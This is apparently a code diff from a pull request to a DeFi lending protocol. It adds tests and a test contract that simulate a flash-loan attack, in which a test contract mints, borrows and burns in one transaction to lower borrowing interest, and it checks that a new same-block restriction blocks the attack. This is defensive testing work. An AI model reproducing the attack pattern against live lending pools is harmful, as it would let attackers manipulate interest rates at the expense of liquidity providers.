+            address(this), /// receiver
+            "0x0"
+        );
+
+		/// @dev Get back the amount deposited in the first place.
+		iTokenContract.burn(address(this), hackDepositAmount);
+	}
+
+	function getBalance(address loanToken) public view returns(uint256) {
+		return IERC20(loanToken).balanceOf(address(this));
 	}
 }

--- a/tests-js/loan-token/MintLoanAndBorrow.test.js
+++ b/tests-js/loan-token/MintLoanAndBorrow.test.js
@@ -160,16 +160,16 @@ contract("LoanTokenBorrowing & MintLoanAndBorrowTest", (accounts) => {
 			const mintLoanAndBorrowTest = await MintLoanAndBorrowTest.new();
 
 			// Check balances
-			console.log("\nsov_initial_balance: " + (await SOV.balanceOf(owner)));
+			console.log("SOV_initial_balance: " + (await SOV.balanceOf(owner)));
 			/// SOV_initial_balance: 99999999999999999999999999999900000000000000000000
 
-			console.log("\nRBTC_initial_balance: " + (await RBTC.balanceOf(owner)));
+			console.log("RBTC_initial_balance: " + (await RBTC.balanceOf(owner)));
 			/// RBTC_initial_balance: 100000000000000000000000000000000000000000000000000
 
-			console.log("\nSUSD_initial_balance: " + (await SUSD.balanceOf(owner)));
+			console.log("SUSD_initial_balance: " + (await SUSD.balanceOf(owner)));
 			/// SUSD_initial_balance: 100000000000000000000000000000000000000000000000000
 
-			console.log("\nTest contract address: " + mintLoanAndBorrowTest.address);
+			console.log("Test contract address: " + mintLoanAndBorrowTest.address);
 
 			// Send underlying tokens SUSD to the test contract. Later it will spend those
 			// on hacking the lending pool.
@@ -180,14 +180,14 @@ contract("LoanTokenBorrowing & MintLoanAndBorrowTest", (accounts) => {
 			await RBTC.transfer(mintLoanAndBorrowTest.address, collateralTokenSent);
 
 			// Check underlying token balance of test contract.
-			console.log("\nSUSD balance on test contract: " + (await SUSD.balanceOf(mintLoanAndBorrowTest.address)));
+			console.log("SUSD balance on test contract: " + (await SUSD.balanceOf(mintLoanAndBorrowTest.address)));
 			/// SUSD balance on test contract: 100000000000000000000
 
 			// Check underlying token balance of test contract w/ contract function.
-			console.log("\nSUSD balance on test contract: " + (await mintLoanAndBorrowTest.getBalance(SUSD.address)));
+			console.log("SUSD balance on test contract: " + (await mintLoanAndBorrowTest.getBalance(SUSD.address)));
 
 			// Check collateral token balance of test contract.
-			console.log("\nRBTC balance on test contract: " + (await RBTC.balanceOf(mintLoanAndBorrowTest.address)));
+			console.log("RBTC balance on test contract: " + (await RBTC.balanceOf(mintLoanAndBorrowTest.address)));
 			/// RBTC balance on test contract: 1501350000000000
 
 			// Approve the transfer of the collateral.
@@ -274,33 +274,33 @@ contract("LoanTokenBorrowing & MintLoanAndBorrowTest", (accounts) => {
 			// **** BALANCES **** //
 
 			// Check owner balances
-			console.log("\nRBTC owner balance: " + (await RBTC.balanceOf(owner)));
+			console.log("RBTC owner balance: " + (await RBTC.balanceOf(owner)));
 			/// RBTC owner balance: 99999999999999999999999999999999998498650000000000
 
-			console.log("\nSUSD owner balance: " + (await SUSD.balanceOf(owner)));
+			console.log("SUSD owner balance: " + (await SUSD.balanceOf(owner)));
 			/// SUSD owner balance: 99999999999999999999999999999900000000000000000000
 
 			// Check flashLoanMockup & flashLoanAttack contract addresses.
-			console.log("\nflashLoanMockup contract address: " + flashLoanMockup.address);
-			console.log("\nflashLoanAttack contract address: " + flashLoanAttack.address);
+			console.log("flashLoanMockup contract address: " + flashLoanMockup.address);
+			console.log("flashLoanAttack contract address: " + flashLoanAttack.address);
 
 			// Check underlying token balance of flashLoanMockup contract.
-			console.log("\nSUSD balance on flashLoanMockup contract: " + (await SUSD.balanceOf(flashLoanMockup.address)));
+			console.log("SUSD balance on flashLoanMockup contract: " + (await SUSD.balanceOf(flashLoanMockup.address)));
 			/// SUSD balance on flashLoanMockup contract: 100000000000000000000 (hunEth)
 
 			// Check underlying token balance of flashLoanAttack contract.
-			console.log("\nSUSD balance on flashLoanAttack contract: " + (await SUSD.balanceOf(flashLoanAttack.address)));
+			console.log("SUSD balance on flashLoanAttack contract: " + (await SUSD.balanceOf(flashLoanAttack.address)));
 			/// SUSD balance on flashLoanAttack contract: 0
 
 			// Check collateral token balance of flashLoanMockup contract.
-			console.log("\nRBTC balance on flashLoanMockup contract: " + (await RBTC.balanceOf(flashLoanMockup.address)));
+			console.log("RBTC balance on flashLoanMockup contract: " + (await RBTC.balanceOf(flashLoanMockup.address)));
 			/// RBTC balance on flashLoanMockup contract: 0
 
 			// Check collateral token balance of flashLoanAttack contract.
-			console.log("\nRBTC balance on flashLoanAttack contract: " + (await RBTC.balanceOf(flashLoanAttack.address)));
+			console.log("RBTC balance on flashLoanAttack contract: " + (await RBTC.balanceOf(flashLoanAttack.address)));
 			/// RBTC balance on flashLoanAttack contract: 1501350000000000
 
-            // **** RUN ATTACK directly (no FL) **** //
+			// **** RUN ATTACK directly (no FL) **** //
 
 			// Fill it up with underlying tokens to attack directly w/o FL.
 			await SUSD.transfer(flashLoanAttack.address, hackAmount1);
@@ -313,7 +313,7 @@ contract("LoanTokenBorrowing & MintLoanAndBorrowTest", (accounts) => {
 				"Avoiding flash loan attack: several txs in same block from same account."
 			);
 
-            // **** RUN ATTACK through FL contract **** //
+			// **** RUN ATTACK through FL contract **** //
 
 			// Call the flashLoanAttack to run the attack.
 			await expectRevert(
@@ -331,20 +331,20 @@ contract("LoanTokenBorrowing & MintLoanAndBorrowTest", (accounts) => {
 
 			// **** SETUP LOAN POOL TO BE ALTERED, iSUSD **** //
 
-            const underlyingToken = SUSD;
-            // loan pool token to alter is iSUSD (loanToken)
-            const collateralToken = WRBTC;
+			const underlyingToken = SUSD;
+			// loan pool token to alter is iSUSD (loanToken)
+			const collateralToken = WRBTC;
 
-            console.log("PREPARATION");
+			console.log("PREPARATION");
 
-            // Amount to be sent for margin trade
-            loan_token_sent = oneEth; // new BN(10).pow(new BN(18));
-            console.log("Amount to be sent for margin trade, loan_token_sent: " + loan_token_sent);
+			// Amount to be sent for margin trade
+			loan_token_sent = oneEth; // new BN(10).pow(new BN(18));
+			console.log("Amount to be sent for margin trade, loan_token_sent: " + loan_token_sent);
 			// Amount to be sent for margin trade, loan_token_sent: 1000000000000000000 (1 Eth)
-            
+
 			console.log("Legitimate users add liquidity to the loan token");
 
-			const baseLiquidity = loan_token_sent.mul(new BN(11)).div(new BN(10)); // loan_token_sent * 1.1
+			const baseLiquidity = loan_token_sent.mul(new BN(105)).div(new BN(100)); // loan_token_sent * 1.1
 			console.log("baseLiquidity: ", baseLiquidity.toString());
 			// baseLiquidity: 1100000000000000000 (1.1 SUSD)
 
@@ -352,9 +352,9 @@ contract("LoanTokenBorrowing & MintLoanAndBorrowTest", (accounts) => {
 			await underlyingToken.mint(accounts[1], baseLiquidity);
 
 			// Transfer liquidity (1.1 SUSD) to the loan pool.
-			await underlyingToken.approve(loanToken.address, baseLiquidity, {"from": accounts[1]});
-			await loanToken.mint(accounts[1], baseLiquidity, {"from": accounts[1]});
-		
+			await underlyingToken.approve(loanToken.address, baseLiquidity, { from: accounts[1] });
+			await loanToken.mint(accounts[1], baseLiquidity, { from: accounts[1] });
+
 			// Set up interest rates.
 			var baseRate = oneEth;
 			var rateMultiplier = oneEth.mul(new BN(2025)).div(new BN(100)); // 20.25e18
@@ -373,7 +373,7 @@ contract("LoanTokenBorrowing & MintLoanAndBorrowTest", (accounts) => {
 
 			// Ready to transfer it to the loan pool.
 			await underlyingToken.approve(loanToken.address, loan_token_sent);
-			
+
 			// Send the margin trade transaction.
 			var leverage_amount = oneEth;
 			var collateral_sent = new BN(0);
@@ -393,14 +393,14 @@ contract("LoanTokenBorrowing & MintLoanAndBorrowTest", (accounts) => {
 			var loan_id = args["loanId"];
 			var positionSize = args["positionSize"];
 			var loan = await sovryn.getLoan(loan_id);
-		
+
 			// Interest paid per day is high because of high utilization rate.
-			console.log("Interest per day (without attack): ", loan["interestOwedPerDay"]/10**15);
-			expect(loan["interestOwedPerDay"]/10**15).to.equal(0.740444139368747);
+			console.log("Interest per day (without attack): ", loan["interestOwedPerDay"] / 10 ** 15);
+			expect(loan["interestOwedPerDay"] / 10 ** 15).to.equal(1.768000054768636);
 
 			// Repays the loan (so that the tokens are there to be loaned again).
 			await sovryn.closeWithSwap(loan_id, accounts[0], positionSize, false, "0x");
-		
+
 			// Now do the same loan again, but use a flash loan to lower interest.
 
 			// Amount attacker will get in flash loan
@@ -418,9 +418,9 @@ contract("LoanTokenBorrowing & MintLoanAndBorrowTest", (accounts) => {
 			// Deposit liquidity 100 SUSD to the loan token.
 			await underlyingToken.approve(loanToken.address, loan_token_sent + flashLoanAmount);
 			await loanToken.mint(accounts[0], flashLoanAmount);
-		
+
 			console.log("Repeating the trade but with the attack flash loan.");
-/* Second time, NOT NECESSARY
+			/* Second time, NOT NECESSARY
 			// Set up interest rates.
 			baseRate = oneEth;
 			rateMultiplier = oneEth.mul(new BN(2025)).div(new BN(100)); // 20.25e18
@@ -428,7 +428,8 @@ contract("LoanTokenBorrowing & MintLoanAndBorrowTest", (accounts) => {
 			kinkLevel = oneEth.mul(new BN(90)); // 90*10**18
 			maxScaleRate = oneEth.mul(new BN(100)); // 100*10**18
 			await loanToken.setDemandCurve(baseRate, rateMultiplier, baseRate, rateMultiplier, targetLevel, kinkLevel, maxScaleRate);
-*/
+			*/
+
 			borrowInterestRate = await loanToken.borrowInterestRate();
 			console.log("Base borrow interest rate (not adjusted by utilization): ", borrowInterestRate.div(oneEth).toString());
 			// Base borrow interest rate (not adjusted by utilization): 17
@@ -452,16 +453,63 @@ contract("LoanTokenBorrowing & MintLoanAndBorrowTest", (accounts) => {
 			loan_id = args["loanId"];
 			positionSize = args["positionSize"];
 			loan = await sovryn.getLoan(loan_id);
-		
+
 			// Interest paid per day is lower than without flash loan.
-			console.log("Interest per day (with attack): ", loan["interestOwedPerDay"]/10**15);
-			expect(loan["interestOwedPerDay"]/10**15).to.equal(0.477533704995224);
+			console.log("Interest per day (with attack): ", loan["interestOwedPerDay"] / 10 ** 15);
+			expect(loan["interestOwedPerDay"] / 10 ** 15).to.equal(0.477533704995224);
 
 			// Conclusion:
-			// With low liquidity of 1.1 SUSD, trading 1 SUSD (high utilization: ~91%)
-			// yields a daily interest of 0.74%
-			// With high liquidity of 100 SUSD, trading 1 SUSD (low utilization: 1%)
-			// yields a daily interest of 0.47%
+			// Providing low liquidity of 1.1 SUSD, trading 1 SUSD (high utilization: ~91%)
+			//   costs a daily interest of 0.74%
+			// Providing high liquidity of 100 SUSD, trading 1 SUSD (low utilization: 1%)
+			//   costs a daily interest of 0.47%
+
+			/*
+				Profiling interest and deposit values:
+
+				104/100 (1.040 SUSD):
+					sentAmounts[1] = 1055799386991083000 (1.055 SUSD)
+					_underlyingBalance() = 1040000000000000000 (1.040 SUSD)
+
+				_borrowOrTrade::sentAmounts
+				borrow::
+					sentAmounts[1] = withdrawAmount;
+					borrow::withdrawAmount
+				marginTrade::
+					sentAmounts[1] = totalDeposit; /// Total amount of deposit.
+					uint256 totalDeposit = _totalDeposit(collateralTokenAddress, collateralTokenSent, loanTokenSent);
+					marginTrade::loanTokenSent
+						loan_token_sent = oneEth;
+
+				uint256 totalDeposit = _totalDeposit(collateralTokenAddress, collateralTokenSent, loanTokenSent);
+					collateralTokenSent = 0
+					loanTokenSent = 1000000000000000000 (1 SUSD)
+					totalDeposit = 1000000000000000000 (1 SUSD)
+
+				(sentAmounts[1], sentAmounts[0]) = _getMarginBorrowAmountAndRate( /// borrowAmount, interestRate
+					leverageAmount,
+					sentAmounts[1] /// depositAmount
+				);
+					depositAmount => borrowAmount
+						1.000 => 1.055799
+
+				So, edge case near liquidity = 1.055800
+
+				Limit point: 105/100 (1.050 SUSD):
+					borrowAmount = 1.049504001533521828
+					interest: 1.768000054768636
+
+				Conclusion:
+
+				Interest curve is not very extreme. It's value swifts around 1.76%
+				(higher bound) and 0.47% (lower bound) w/ liquidities ranging
+				from 1.050 SUSD to 100 SUSD and margin trading depositAmount of 1 SUSD.
+
+				So an attack (flash loan or not, although FL are not allowed anymore
+				due to check implemented on NotInTheSameBlock branch) would give
+				the LP an advantage of getting loans with a lower interest of
+				around 1.3% on most extreme case (maximum utilization of the loan pool).
+			*/
 		});
 	});
 });

--- a/tests-js/loan-token/MintLoanAndBorrow.test.js
+++ b/tests-js/loan-token/MintLoanAndBorrow.test.js
@@ -1,0 +1,141 @@
+const { expect } = require("chai");
+const { expectRevert, BN, expectEvent } = require("@openzeppelin/test-helpers");
+const FeesEvents = artifacts.require("FeesEvents");
+const TestToken = artifacts.require("TestToken");
+const LoanOpenings = artifacts.require("LoanOpenings");
+const MintLoanAndBorrowTest = artifacts.require("MintLoanAndBorrowTest");
+
+const {
+	getSUSD,
+	getRBTC,
+	getWRBTC,
+	getBZRX,
+	getSOV,
+	getLoanTokenLogic,
+	getLoanToken,
+	getLoanTokenWRBTC,
+	loan_pool_setup,
+	set_demand_curve,
+	lend_to_pool,
+	getPriceFeeds,
+	getSovryn,
+	decodeLogs,
+	verify_sov_reward_payment,
+	CONSTANTS,
+} = require("../Utils/initializer.js");
+
+const wei = web3.utils.toWei;
+
+const oneEth = new BN(wei("1", "ether"));
+const tenEth = new BN(wei("10", "ether"));
+const hunEth = new BN(wei("100", "ether"));
+
+// This decodes longs for a single event type, and returns a decoded object in
+// the same form truffle-contract uses on its receipts
+
+contract("LoanTokenBorrowing", (accounts) => {
+	let owner, account1;
+	let sovryn, SUSD, WRBTC, RBTC, BZRX, loanToken, loanTokenWRBTC, SOV;
+
+	before(async () => {
+		[owner, account1] = accounts;
+	});
+
+	beforeEach(async () => {
+		SUSD = await getSUSD();
+		RBTC = await getRBTC();
+		WRBTC = await getWRBTC();
+		BZRX = await getBZRX();
+		const priceFeeds = await getPriceFeeds(WRBTC, SUSD, RBTC, sovryn, BZRX);
+
+		sovryn = await getSovryn(WRBTC, SUSD, RBTC, priceFeeds);
+
+		const loanTokenLogicStandard = await getLoanTokenLogic();
+		loanToken = await getLoanToken(loanTokenLogicStandard, owner, sovryn, WRBTC, SUSD);
+		loanTokenWRBTC = await getLoanTokenWRBTC(loanTokenLogicStandard, owner, sovryn, WRBTC, SUSD);
+		await loan_pool_setup(sovryn, owner, RBTC, WRBTC, SUSD, loanToken, loanTokenWRBTC);
+
+		SOV = await getSOV(sovryn, priceFeeds, SUSD);
+	});
+
+	describe("Test borrow", () => {
+		it("Test borrow", async () => {
+			// prepare the test
+			await set_demand_curve(loanToken);
+			await lend_to_pool(loanToken, SUSD, owner);
+			// determine borrowing parameter
+			const withdrawAmount = tenEth;
+			// compute the required collateral. params: address loanToken, address collateralToken, uint256 newPrincipal,uint256 marginAmount, bool isTorqueLoan
+			const collateralTokenSent = await sovryn.getRequiredCollateral(
+				SUSD.address,
+				RBTC.address,
+				withdrawAmount,
+				new BN(10).pow(new BN(18)).mul(new BN(50)),
+				true
+			);
+			const durationInSeconds = 60 * 60 * 24 * 10; // 10 days
+			// compute expected values for asserts
+			const interestRate = await loanToken.nextBorrowInterestRate(withdrawAmount);
+			// principal = withdrawAmount/(1 - interestRate/1e20 * durationInSeconds /  31536000)
+			const principal = withdrawAmount
+				.mul(oneEth)
+				.div(oneEth.sub(interestRate.mul(new BN(durationInSeconds)).mul(oneEth).div(new BN(31536000)).div(hunEth)));
+			//TODO: refactor formula to remove rounding error subn(1)
+			const borrowingFee = (await sovryn.borrowingFeePercent()).mul(collateralTokenSent).div(hunEth); /*.addn(1)*/
+			const expectedBalance = (await SUSD.balanceOf(account1)).add(withdrawAmount);
+			// approve the transfer of the collateral
+			await RBTC.approve(loanToken.address, collateralTokenSent);
+			const sov_initial_balance = await SOV.balanceOf(owner);
+
+			// borrow some funds
+			const { tx, receipt } = await loanToken.borrow(
+				"0x0", // bytes32 loanId
+				withdrawAmount, // uint256 withdrawAmount
+				durationInSeconds, // uint256 initialLoanDuration
+				collateralTokenSent, // uint256 collateralTokenSent
+				RBTC.address, // address collateralTokenAddress
+				owner, // address borrower
+				account1, // address receiver
+				web3.utils.fromAscii("") // bytes memory loanDataBytes
+			);
+			// assert the trade was processed as expected
+			await expectEvent.inTransaction(tx, LoanOpenings, "Borrow", {
+				user: owner,
+				lender: loanToken.address,
+				loanToken: SUSD.address,
+				collateralToken: RBTC.address,
+				newPrincipal: principal,
+				newCollateral: collateralTokenSent.sub(borrowingFee),
+				interestRate: interestRate,
+			});
+			const decode = decodeLogs(receipt.rawLogs, LoanOpenings, "Borrow");
+			const args = decode[0].args;
+
+			expect(args["interestDuration"] >= durationInSeconds - 1 && args["interestDuration"] <= durationInSeconds).to.be.true;
+			expect(new BN(args["currentMargin"])).to.be.a.bignumber.gt(new BN(49).mul(oneEth));
+
+			// assert the user received the borrowed amount
+			expect(await SUSD.balanceOf(account1)).to.be.a.bignumber.equal(expectedBalance);
+			await verify_sov_reward_payment(receipt.rawLogs, FeesEvents, SOV, owner, args["loanId"], sov_initial_balance, 1);
+		});
+
+		it("Mint, Borrow and Burn in 1 tx should fail", async () => {
+			await set_demand_curve(loanToken);
+			await lend_to_pool(loanToken, SUSD, owner);
+			const mintLoanAndBorrowTest = await MintLoanAndBorrowTest.new();
+            await mintLoanAndBorrowTest.callMintAndBorrowAndBurn(
+                RBTC.address, // address collateralTokenAddress
+                loanToken.address,
+                collateralTokenSent
+            );
+            expectRevert(
+				mintLoanAndBorrowTest.callMintAndBorrowAndBurn(
+					RBTC.address, // address collateralTokenAddress
+                    loanToken.address,
+					1
+				),
+				"8"
+			);
+		});
+	});
+});

--- a/tests/loanToken/trading/test_flash_loan_lower_interest.py
+++ b/tests/loanToken/trading/test_flash_loan_lower_interest.py
@@ -79,7 +79,7 @@ def test_margin_trading_sending_loan_tokens(accounts, sovryn, loanToken, SUSD, W
     # deposits to the loan token
     loanToken.mint(accounts[0], flashLoanAmount)
 
-    print("reepating the trade but with the attack flash loan")
+    print("Repeating the trade but with the attack flash loan")
 
     # sets up interest rates
     baseRate = 1e18


### PR DESCRIPTION
Prevent lending and withdrawal within the same tx/block #199 (medium):

To protect from the lending fees manipulation using flash loan we need to prevent lending and withdrawing from the pools in the same tx/block by the same account.

Check more details at https://github.com/DistributedCollective/Sovryn-smart-contracts/issues/199